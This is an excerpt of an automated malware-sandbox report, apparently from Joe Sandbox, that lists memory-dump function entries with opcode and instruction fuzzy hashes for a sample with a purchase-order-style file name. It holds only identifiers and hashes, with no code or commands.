Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction ID: 50880c0719c0abde6a5a5ebc47a2187129700fb6e57f96c53587af9709b90016
Opcode Fuzzy Hash: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction Fuzzy Hash: 1BE08C34908208EBC704EF94D844A6CBBB9EB85310F50D0D9880913390CA316E42CB81

Function 05B07F98 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb04d416cfdcb7889cd8b7ccc84ed4650a6af135c777f680ada2666607a016a
Instruction ID: 58654eb4c79817d0b89ef7f3ab155d04dbf95d13061613a5e77b70a1b10b3824
Opcode Fuzzy Hash: 8cb04d416cfdcb7889cd8b7ccc84ed4650a6af135c777f680ada2666607a016a
Instruction Fuzzy Hash: 08E01272901248BFCB00EFF5D804A9EFBF9DB05201F1048E5990597150EE715A04ABA5

Function 05B07FE0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction ID: 6cee91248bd23977c2a256bb6cd2f473efd02da468873305ba0f3a9f7c8de9a9
Opcode Fuzzy Hash: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction Fuzzy Hash: FBE0EC34908248EBC704DF98D95196CFBB9EB46304F1091D9980957391DE316E42DB95

Function 05B087D0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction ID: 81450e66baa2addaf59fa19128456d4475756a4ae19678214b82215ac8d4eb73
Opcode Fuzzy Hash: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction Fuzzy Hash: 32E01234908208EBC704DFA9D95197CFFB9EB49304F1091D9D80A67395CB316E42DB95

Function 05B037D8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction ID: d02906d809bd19e6b68326efb0dd5ee619a87894f60a8c571f7b7f06a80eba12
Opcode Fuzzy Hash: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction Fuzzy Hash: 99E08C78908208EBC704DF98D84696CBBB9FB46300F1094D9C80913381CA326E42CB91

Function 05B03EF8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction ID: 37e4b6203dbf7e00e1f3c38b88d139da08374b33f871bee281864073e22ed52e
Opcode Fuzzy Hash: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction Fuzzy Hash: 7FE01234908208EBCB04DFD4E94596CFBB9EB86305F5095EDD80957391CB316E42DB95

Function 05B08E58 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e87e51fc52df84e9224561461d593dfa4f8542553ccec6e49d64e40694a84f9
Instruction ID: 0d2078a6848d78159478ed8d45631f2ba035a6df70b99faef2195bd3c1630e11
Opcode Fuzzy Hash: 7e87e51fc52df84e9224561461d593dfa4f8542553ccec6e49d64e40694a84f9
Instruction Fuzzy Hash: C5E01272901208BFCB00EFF5D804A5EBBB9DB05201F1044F5A50593150EE715A10ABA5

Function 05B012A8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction ID: 57e51ab1becacf552a8515f9329a926dededd5f321a5828e3a96eb46d480f1da
Opcode Fuzzy Hash: a93d83fe7a7436b337ae880a1e559aeaaab56066217232373e052c0f0a3c517e
Instruction Fuzzy Hash: E9E0EC34A08208EBC708DF98D945A6CBBB9EB46304F1091E9D90957395CA31AE46DB95

Function 05CA8CF8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 548b66a9495d8c1e7aeeac7fa026f734b05f8ed6c0ca85e7b673c6be8cc2e088
Instruction ID: 4cc0f0a5eca7d19c299d86940389ab36bd66ef36ca8f4838763c26b6176e482e
Opcode Fuzzy Hash: 548b66a9495d8c1e7aeeac7fa026f734b05f8ed6c0ca85e7b673c6be8cc2e088
Instruction Fuzzy Hash: E6E01273905248FBCB00EFF5D804A5EBBB9DB55205F1049A5950693151EE714A00ABA5

Function 05CACB68 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d229db213909653bb3f702dbf56bc065d0df09bfcbbc0a1490454a1c2defc73d
Instruction ID: c1d35aeda138c340e5990bb3f361df0eee9f850023797ffa7cc1cbc08e6a9f49
Opcode Fuzzy Hash: d229db213909653bb3f702dbf56bc065d0df09bfcbbc0a1490454a1c2defc73d
Instruction Fuzzy Hash: 22E0C234908208EBCB04DFE4E98496CFBB9EB45314F1080EDD80913380CB725E42CB81

Function 05CAFEE0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d229db213909653bb3f702dbf56bc065d0df09bfcbbc0a1490454a1c2defc73d
Instruction ID: 8a247becfc35f919440da281e06304b19a253d5ccaba7c4c62287acdf2ea96b5
Opcode Fuzzy Hash: d229db213909653bb3f702dbf56bc065d0df09bfcbbc0a1490454a1c2defc73d
Instruction Fuzzy Hash: C9E0C238908208EBC704DF98D84096CFFB9EB45304F2094DDC80957382CB315E42CB80

Function 05B18490 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a474ecae4f01d51106eb5288f448f614c38187b42cbd5dec2be92c7ee9db2b
Instruction ID: 404ebdaf0568d561ce050f0e18956a92b180cb9e58ac334f597d5e9a7cc6b6fb
Opcode Fuzzy Hash: 97a474ecae4f01d51106eb5288f448f614c38187b42cbd5dec2be92c7ee9db2b
Instruction Fuzzy Hash: F8E0D8305093424FD715C714E840F47BFE1AF80202F08CE6DA4890F025DBB4BC8ACB86

Function 0584D4A0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef68b8f20a29990bc971ef093abf5082061dca82d27fd21290444a7217f6041f
Instruction ID: 749fce2511beb3e2bc2fabca8cacda197ad6be644134d6e13828cf3c365c5557
Opcode Fuzzy Hash: ef68b8f20a29990bc971ef093abf5082061dca82d27fd21290444a7217f6041f
Instruction Fuzzy Hash: 70E0C230A10308EFDB00DFB5E941A6DBBB9EB44200F1084A8EC08EB200EA322F04A784

Function 058493A3 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f006708c3b671b04d168d4a07ab093ec81f2283cbd68665957476a847ac80967
Instruction ID: 776051df2ac98a700a5f5b39b50fa6e70d4f1afdfde2f00b0576d9a8a64311ed
Opcode Fuzzy Hash: f006708c3b671b04d168d4a07ab093ec81f2283cbd68665957476a847ac80967
Instruction Fuzzy Hash: 43F05F74E21628CFCBA1CF24DD4569ABBF5BF49342F5051D9944DA2251EB301E80CF01

Function 05B075C0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4932212396fb0b987b2e9030bbb5c607ca3fdc933e68eb4fc4bfab15bd3a9bbe
Instruction ID: 16b1773ba36a0cdfeddf30ec90afba0080502a4c8e52cac9410f7428f0984489
Opcode Fuzzy Hash: 4932212396fb0b987b2e9030bbb5c607ca3fdc933e68eb4fc4bfab15bd3a9bbe
Instruction Fuzzy Hash: 40E0C230808208EFC710DFA8C810AACFFB8EB09200F1080D9C809533C1DE31BE42CB90

Function 05B07F89 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cfc8cfa5f5e6c8271e76a80d9a26ed1460674bb28bee07273c1c5dc00ff01e5
Instruction ID: b594fcfefa6d4616750024bcb8241f16e5093f246de49e13f30b4104c7f8797e
Opcode Fuzzy Hash: 1cfc8cfa5f5e6c8271e76a80d9a26ed1460674bb28bee07273c1c5dc00ff01e5
Instruction Fuzzy Hash: 12E08CB2505288AFC710DBE4E904BAABBB2EF06201F1005EAD5055B0A1DE311E099FA5

Function 05B05F50 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4932212396fb0b987b2e9030bbb5c607ca3fdc933e68eb4fc4bfab15bd3a9bbe
Instruction ID: e2db95199302b289892d556af5c6c024e81372c95f34c0ad37bc65dba50233ab
Opcode Fuzzy Hash: 4932212396fb0b987b2e9030bbb5c607ca3fdc933e68eb4fc4bfab15bd3a9bbe
Instruction Fuzzy Hash: A7E0C230808208EFC710DFA8C81066CFFF8EB05204F1480D9D849933C1DA35AE42CF50

Function 05B092A8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4932212396fb0b987b2e9030bbb5c607ca3fdc933e68eb4fc4bfab15bd3a9bbe
Instruction ID: 3842a9bee01133a44438ca6a36831badb2b3fc780d6f633a6ebb0b3f5ae3ff22
Opcode Fuzzy Hash: 4932212396fb0b987b2e9030bbb5c607ca3fdc933e68eb4fc4bfab15bd3a9bbe
Instruction Fuzzy Hash: 6DE08C30908208EFC740DBA8C9006ACBFB8AB06200F1080D9885953382DA31AE42DB50

Function 00D2F148 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ddb9a00688539f3cdd4b1e8c792fc062af7b0bd2c3d34e716e8618bff81e46f
Instruction ID: 6a2cf3296ccd9f20f47f67569708f7982c0af4af4c341c29bb590d47913dd79a
Opcode Fuzzy Hash: 6ddb9a00688539f3cdd4b1e8c792fc062af7b0bd2c3d34e716e8618bff81e46f
Instruction Fuzzy Hash: 29E0E274D10318EFCB44EFB8E94569DBBB5AB04205FA044FA990892390EB319A91CBA1

Function 0584D458 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de4de6496a45ed0da509b87c7c5bf1bc2525efdde2c792a18f00a61014140d24
Instruction ID: 1d578bc6e54d7d5f928129958f0f2e4748b187a7cfe29608a2ed821a7ce9e826
Opcode Fuzzy Hash: de4de6496a45ed0da509b87c7c5bf1bc2525efdde2c792a18f00a61014140d24
Instruction Fuzzy Hash: B6E05B30A0120DEFCB00DFA5E54165DB7F9EB45300F1045A9ED08D7705EA316F059B95

Function 00D2630B Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cc7cbd73a3cbb8c2a86d8ed9ba8f7be8f40b3696dc98250bad30eb40e5a9447
Instruction ID: 925a39d5a35ef53878d7b915fce8ea33c6819b0af9a4f5fbad5e08a298ce7a8a
Opcode Fuzzy Hash: 0cc7cbd73a3cbb8c2a86d8ed9ba8f7be8f40b3696dc98250bad30eb40e5a9447
Instruction Fuzzy Hash: 0AE01AB590C3988FCB508B24D898699BB70AB5A310F1144E7E80DAB285DA758A80DF41

Function 0584AC03 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b2ed7cb240d82f5dbc354513764bd593728275eee66a2d7c178161b7802e28
Instruction ID: 562bc2be9f043940cc6d78a58c96d7e19ea48b8543785ab413e878b4f56f478b
Opcode Fuzzy Hash: 97b2ed7cb240d82f5dbc354513764bd593728275eee66a2d7c178161b7802e28
Instruction Fuzzy Hash: 79E01A78A042288BCB94EF64D88579D7BF7EB49300F0040A8E80AA7294CF302D89CF19

Function 0584AFD6 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de43e972b50a64b6a7319c08a6548c372a1fc4314d8ac905319c33dc5ef5c06c
Instruction ID: 4f8c51c59236c5763f4e7775744277fd31e7d2a5575e4ba6aaf626733b50c088
Opcode Fuzzy Hash: de43e972b50a64b6a7319c08a6548c372a1fc4314d8ac905319c33dc5ef5c06c
Instruction Fuzzy Hash: 48E01A70A4022A8BCB64EF24D8457A97BB2FB46301F0044A9E80AB3651DF302D889F84

Function 0584A967 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fa7303a0faef5b439a60993503e1cca1a7947810cdd633e2034856471da23eb
Instruction ID: 9f0dd6cb8b6129bebafe42ca9a7d00996651af9eebeaac4e75b3754904d3e75d
Opcode Fuzzy Hash: 4fa7303a0faef5b439a60993503e1cca1a7947810cdd633e2034856471da23eb
Instruction Fuzzy Hash: 67E0E570A102289BCB18EB64D8557997BB2EB85301F0004A9A90EB3244CE302E88CF25

Function 0584B02C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37644da646097f16175b200e01cdbd39a758967f6aae8c007c502bd6b2f5e0
Instruction ID: c4128f6c72e660c53f65bde29df1c864c014344f47d660c07b0df350ba357aff
Opcode Fuzzy Hash: 4f37644da646097f16175b200e01cdbd39a758967f6aae8c007c502bd6b2f5e0
Instruction Fuzzy Hash: 53E01A30910228CBDB14EF54E846B9C7FFAEB89301F1089A8A80AB7344CE312D85CF24

Function 0584ABAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6d1a7071a0aff19ad4d9f1f1bfcf2d96f58087039b3bc4a83d27ec7106d568f
Instruction ID: d9b0269f97bfe846a4d14c78d1726ec33465b31cc3d1ac659d96effe3a96a7a6
Opcode Fuzzy Hash: a6d1a7071a0aff19ad4d9f1f1bfcf2d96f58087039b3bc4a83d27ec7106d568f
Instruction Fuzzy Hash: 51E01A70A002288BCB14EF64D946799BBB2EB4A301F0004AAA909BB251CF306D858F14

Function 0584B304 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f29a2da3376390bbdda01d7323987c506481b24d54485c52b1a4c8d609bea909
Instruction ID: d9f9bf8c1f41397a9085712d6d172e9f7278fbecc2f5f3040ec7f5ab856f452c
Opcode Fuzzy Hash: f29a2da3376390bbdda01d7323987c506481b24d54485c52b1a4c8d609bea909
Instruction Fuzzy Hash: 46E012749012288BD754EF15DC85F9ABBB2FB49300F0081A9E80AA3240CF305D85CF18

Function 0584B35A Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d60b3015eb58ddcefa1c0d72e13a3641be4a40a305ba873df3a5f54f2e94662
Instruction ID: 47a827ad60fbc98cc9100969ab3c1531ca8194cff4f1bba2025d1e8c9bbf8c15
Opcode Fuzzy Hash: 4d60b3015eb58ddcefa1c0d72e13a3641be4a40a305ba873df3a5f54f2e94662
Instruction Fuzzy Hash: B1E01A70A04228CFCB54EF64D9857DABBB2EB85301F1000A9A84AA7254CF752EC5CF64

Function 05B184A0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6251efa46288c222dcdebc4e1a0938c5fbf1a39711dce0e2304bfcbdb406e28e
Instruction ID: 0564dc70e13f3551cfadb6e80f89da7882cc96dd0cb1501d413a3d66322e9c2d
Opcode Fuzzy Hash: 6251efa46288c222dcdebc4e1a0938c5fbf1a39711dce0e2304bfcbdb406e28e
Instruction Fuzzy Hash: 25D012355053129BD725D714E440D8B7BE5AF80201B04CE29A44A4B528DF70BD8A8B85

Function 058409B4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925074c580f4b168ca7f7863f2a405600015686e6bd9fe3c4199f49508eccc0b
Instruction ID: a3dbf8782b65064de6f9a5253f67980fdf6dafa2f0219576ec7a42510c990e0b
Opcode Fuzzy Hash: 925074c580f4b168ca7f7863f2a405600015686e6bd9fe3c4199f49508eccc0b
Instruction Fuzzy Hash: BCE0E23191111CDFEB10CEAAC28877EB671BB02318F680165CE01AA042D7360E84AF56

Function 05B0AD9E Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c59d7bdd5a91717fa3aa9f7082a31bb5bfae0cb2ba0b3118958e1a01accfdeb
Instruction ID: f8f01b877c2abffe037e88aa06f416d97f19eafcbba9427265b80485fb9d829b
Opcode Fuzzy Hash: 3c59d7bdd5a91717fa3aa9f7082a31bb5bfae0cb2ba0b3118958e1a01accfdeb
Instruction Fuzzy Hash: 3BE0BD3998422ECFDB20EF20C948BD8BFB1AB18300F1081E6840963290D374AB85EF50

Function 05B1FB48 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5b81457c0d7f0f336b4a4c05ace0dd23692be0304d30fe5009d8840671e451
Instruction ID: 790d1b6a50ad1e01d3b16077f1ab9f821c0ed067d67afd517a64d4c8ecc030bb
Opcode Fuzzy Hash: 2b5b81457c0d7f0f336b4a4c05ace0dd23692be0304d30fe5009d8840671e451
Instruction Fuzzy Hash: A1C08C35740224574208A2DDA4448DABBDEDBCE2623508166DF0DC7300DE22AC4387DA

Function 05843173 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 026eb62c948e091a2a23723c5e76472f485b6b98e35097adbd70c30d4eb29fd8
Instruction ID: 19303d1d50cd6241b6f86ff77b27a9f3649f7dcb47a2b6c68057a0fa1ea8baf1
Opcode Fuzzy Hash: 026eb62c948e091a2a23723c5e76472f485b6b98e35097adbd70c30d4eb29fd8
Instruction Fuzzy Hash: FEE04278D24218DBEB14DF28E955B9CBBB2BB05310F408496E909A2211DB309E81CF05

Function 05B0509F Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8bc6c658cf59a068d4eb452105700d1208170b09c81004fef2e563ec826043
Instruction ID: 24940762005e4283dc42bc1e28d12f37ce7dd155c897cda5aaa579a46f12e626
Opcode Fuzzy Hash: 9d8bc6c658cf59a068d4eb452105700d1208170b09c81004fef2e563ec826043
Instruction Fuzzy Hash: B4D05E30805324CFEB10DF21D510B6DBBF2EB45300F0090EA9845B72D4CA385E449F11

Function 00D2EFC8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c018c083e507a4c0b6b968f8a87dc200c899f0b8f47d16cdb50314daf052eb0
Instruction ID: c76b1888087f2696c9da5c87bf55048c8250c01083fa31d267a60af471bccd65
Opcode Fuzzy Hash: 0c018c083e507a4c0b6b968f8a87dc200c899f0b8f47d16cdb50314daf052eb0
Instruction Fuzzy Hash: C0B02B3002030443C24017C5B80C334B79C4703305F444C10660D010B04FB14840CA24

Function 05B1CD38 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

